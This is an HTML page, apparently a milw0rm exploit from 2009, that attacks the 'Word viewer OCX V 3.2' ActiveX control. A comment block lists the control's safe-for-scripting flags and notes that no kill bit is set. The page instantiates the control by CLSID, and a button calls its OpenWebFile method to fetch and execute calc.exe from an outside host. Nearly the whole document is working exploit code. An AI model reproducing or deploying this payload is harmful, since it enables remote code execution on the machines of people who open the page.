39 lines
No EOL
1.2 KiB
HTML
39 lines
No EOL
1.2 KiB
HTML
<HTML>
|
|
---------------------------------------------------------- <br>
|
|
Word viewer OCX V 3.2 Remote File execution exploit<br>
|
|
---------------------------------------------------------- <br>
|
|
-----------------------------------<br>
|
|
# By Mountassif Moad a.k.a Stack #
|
|
-----------------------------------<br>
|
|
<!--
|
|
v4 Team & evil finger
|
|
Class OA
|
|
GUID: {97AF4A45-49BE-4485-9F55-91AB40F22BF2}
|
|
Number of Interfaces: 1
|
|
Default Interface: _DOA
|
|
RegKey Safe for Script: True
|
|
RegkeySafe for Init: True
|
|
KillBitSet: False
|
|
Report for Clsid: {97AF4A45-49BE-4485-9F55-91AB40F22BF2}
|
|
RegKey Safe for Script: True
|
|
RegKey Safe for Init: True
|
|
Implements IObjectSafety: True
|
|
IDisp Safe: Safe for untrusted: caller,data
|
|
IPersist Safe: Safe for untrusted: caller,data
|
|
IPStorage Safe: Safe for untrusted: caller,data -->
|
|
<title>Word viewer OCX V 3.2 Remote File execution exploit</title>
|
|
<BODY>
|
|
<object id=Stack classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22BF2}"></object>
|
|
<SCRIPT>
|
|
function Do_it()
|
|
{
|
|
File = "http://monmaroc.com/calc.exe"
|
|
Stack.OpenWebFile(File)
|
|
}
|
|
|
|
</SCRIPT>
|
|
<input language=JavaScript onclick=Do_it() type=button value="exploit">
|
|
</body>
|
|
</HTML>
|
|
|
|
# milw0rm.com [2009-01-13] |